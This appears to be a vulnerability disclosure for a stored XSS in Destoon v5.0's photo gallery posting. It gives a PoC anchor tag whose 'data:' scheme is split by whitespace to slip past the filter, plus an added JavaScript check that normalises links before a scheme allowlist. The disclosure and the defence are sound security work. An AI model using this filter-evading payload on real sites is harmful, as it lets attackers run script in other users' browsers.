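### Brief description:
destoon /v5.0/ stored XSS, hits whatever target you pick (bypass 3)
### Detailed description:
Related URL: [WooYun: destoon /v5.0/ stored XSS, hits whatever target you pick (bypass 2)](http://www.wooyun.org/bugs/wooyun-2014-062052)
When publishing a photo gallery entry, the submitted code is not filtered.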
[<img src="https://images.seebug.org/upload/201406/110947477e6758bb4df67b5dd8859aa829e34015.jpg" alt="1.jpg" width="600">](https://images.seebug.org/upload/201406/110947477e6758bb4df67b5dd8859aa829e34015.jpg)
PoC:
```
<a href=d
	ata:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2829%29%3C%2F%73%63%72%69%70%74%3E>M
```
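The PoC above splits the `data:` scheme with a newline and a tab; browsers remove ASCII tab and newline characters from a URL before parsing it, so a filter that searches for the literal scheme name never sees it. The check below is an added example, not Destoon's code or part of the original report: it normalises the value the same way before applying a scheme allowlist. The function names, the allowlist and the sample value are assumptions, and the input is assumed to be the attribute value after HTML entity decoding.

```javascript
// Added example (hypothetical helper names, not Destoon code).
// Assumed policy: only these schemes may appear in user-supplied links.
const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]);

// What a literal blocklist does: search the raw string for scheme names.
function naiveFilterAllows(raw) {
  return !/(javascript|vbscript|data):/i.test(raw);
}

// Mirror the browser's URL pre-processing: trim leading/trailing C0
// control characters and spaces, then drop every tab, LF and CR.
function normalizeHref(raw) {
  return String(raw)
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "")
    .replace(/[\t\n\r]/g, "");
}

// Return the lower-cased scheme, or null for a relative reference.
function hrefScheme(raw) {
  const m = /^([a-zA-Z][a-zA-Z0-9+.\-]*):/.exec(normalizeHref(raw));
  return m ? m[1].toLowerCase() : null;
}

// Allow relative references and allowlisted schemes; reject the rest.
function isSafeHref(raw) {
  const scheme = hrefScheme(raw);
  return scheme === null || ALLOWED_SCHEMES.has(scheme);
}

// Constructed sample in the shape of the PoC: "data:" split by LF + tab.
const SPLIT_SCHEME_SAMPLE = "d\n\tata:text/html,x";

for (const href of [SPLIT_SCHEME_SAMPLE, "https://example.com/a", "/gallery/1.html"]) {
  console.log(JSON.stringify(href),
    "naive filter allows:", naiveFilterAllows(href),
    "| scheme:", hrefScheme(href),
    "| allowlist accepts:", isSafeHref(href));
}
```
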
### Proof of vulnerability:
[<img src="https://images.seebug.org/upload/201406/1109482775e1b2896a787b7c6b79c8b4f4257b96.jpg" alt="2.jpg" width="600">](https://images.seebug.org/upload/201406/1109482775e1b2896a787b7c6b79c8b4f4257b96.jpg)
Clicking the link pops the alert.